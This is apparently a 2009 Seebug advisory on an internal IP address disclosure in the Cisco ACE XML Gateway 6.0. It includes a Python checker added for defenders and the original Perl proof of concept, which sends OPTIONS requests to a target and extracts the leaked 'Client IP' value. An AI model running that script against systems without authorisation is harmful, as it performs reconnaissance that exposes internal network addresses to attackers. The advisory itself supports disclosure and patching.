Cisco Application Control Engine (ACE) XML Gateway IP Address Information Disclosure Vulnerability

2009-09-28T00:00:00
ID SSV:12400
Type seebug
Reporter Root
Modified 2009-09-28T00:00:00

Description

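Bugtraq ID: 36522

The Cisco ACE XML Gateway is a key component of the Cisco Application Control Engine (ACE) product family. The Cisco ACE XML Gateway lacks proper error handling, and a remote attacker can exploit this to obtain internal IP address information. When the gateway cannot find a handler that matches a request, it replies directly to the client with an error message that contains the internal IP address. The affected requests are not limited to the OPTIONS request type: a GET request for a path that has no handler configured leaks the internal IP address in the same way.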
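A defender-side check for the behaviour described above, as an added example that is not part of the original advisory or its PoC: it scans a captured HTTP response (for instance from a proxy or test harness in front of the gateway) for internal addresses, including the `Client IP:` label used in the error text. The sample responses and all function names are constructed for illustration.

```python
import ipaddress
import re

# "Client IP:" is the label in the gateway's error text; everything else in
# the sample responses below is constructed for illustration.
LABEL_RE = re.compile(r"Client IP:\s*([0-9A-Fa-f:.]+)")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

SAMPLE_LEAK = ("HTTP/1.1 404 Not Found\r\nContent-Type: text/plain\r\n\r\n"
               "No handler for request.\r\nClient IP: 10.20.30.40\r\n")
SAMPLE_CLEAN = ("HTTP/1.1 404 Not Found\r\nContent-Type: text/plain\r\n\r\n"
                "Not found. Upstream resolver 8.8.8.8 unreachable.\r\n")


def internal_address(candidate):
    """Return the normalised address if it is non-routable, else None."""
    try:
        addr = ipaddress.ip_address(candidate)
    except ValueError:  # e.g. 999.1.1.1 or a stray hex token
        return None
    if addr.is_private or addr.is_loopback or addr.is_link_local:
        return str(addr)
    return None


def find_internal_ip_leaks(raw_response):
    """Scan one raw HTTP response for internal addresses sent to the client."""
    head, _, body = raw_response.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    findings = []
    for where, text in (("header", head), ("body", body)):
        labelled = {m.group(1).rstrip(".") for m in LABEL_RE.finditer(text)}
        for candidate in sorted(labelled | set(IPV4_RE.findall(text))):
            ip = internal_address(candidate)
            if ip:
                findings.append({"status": status_line, "where": where,
                                 "ip": ip, "labelled": candidate in labelled})
    return findings


if __name__ == "__main__":
    for name, raw in (("leak", SAMPLE_LEAK), ("clean", SAMPLE_CLEAN)):
        print(name, find_internal_ip_leaks(raw))
```

Run against responses to both OPTIONS requests and GET requests for unconfigured paths, since the description names both as triggers.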

Affected products

Cisco Application Control Engine (ACE) XML Gateway 6.0
Cisco Application Control Engine (ACE) Web App. Firewall 6.0
Cisco ACE XML Gateway

Vendor solution

Version 6.1 of the Cisco Application Control Engine (ACE) XML Gateway will be released in November 2009. Users are advised to follow the vendor to obtain the latest version: http://www.cisco.com/en/US/products/ps7314/

#!/usr/bin/perl -w
#
# Cisco ACE XML Gateway <= 6.0
# Internal IP Address Disclosure
#
# -=- PRIV8 -=- 0day -=- PRIV8 -=- 0day -=- PRIV8 -=-
#
# -[nitrØus]-  [ Alejandro Hernandez H. ]
# nitrousenador -at- gmail -dot- com
# http://www.brainoverflow.org
#
# México / 25-Aug-2ØØ9
#
# -=- PUBLIC NOW -=-
# Published on September 24th, 2009
#
# ADVISORY: http://www.brainoverflow.org/advisories/cisco_ace_xml_gw_ip_disclosure.txt
#
use strict;
use Socket qw/ :DEFAULT :crlf /; # $CRLF
use IO::Socket;
sub header
{
 print "  .+==================================+.\n";
 print " /     Cisco ACE XML Gateway <= 6.0     \\\n";
 print "|     Internal IP Address Disclosure     |\n";
 print "|                                        |\n";
 print " \\             -nitr0us-                /\n";
 print "  `+==================================+`\n\n";
}
sub usage
{
 header;
 print "Usage: $0 <host> [port(default 80)]\n";
 exit 0xdead;
}
my $host = shift || usage;
my $port = shift || 80;
my $axg;
my $axg_response;
my @payloads = ("OPTIONS / HTTP/1.0" . $CRLF . $CRLF,
  "OPTIONS / HTTP/1.1" . $CRLF . "Host: " . $host . $CRLF . $CRLF);
header;
print "[+] Connecting to $host on port $port ...\n";
for(@payloads){
 $axg = IO::Socket::INET->new( PeerAddr => $host,
     PeerPort => $port,
     Proto => 'tcp')
  or die "[-] Could not create socket: $!\n";
 print "[+] Sending payload  ...\n";
 print $axg $_;
 $axg->read($axg_response, 1024);
 print "[+] Parsing response ...\n";
 if($axg_response =~ /Client IP: (.*)/){
  print "[+] Internal IP disclosure: $1\n";
  $axg->close();
  exit 0xbabe;
 }
 $axg->close();
}
print "[-] Not vulnerable !\n";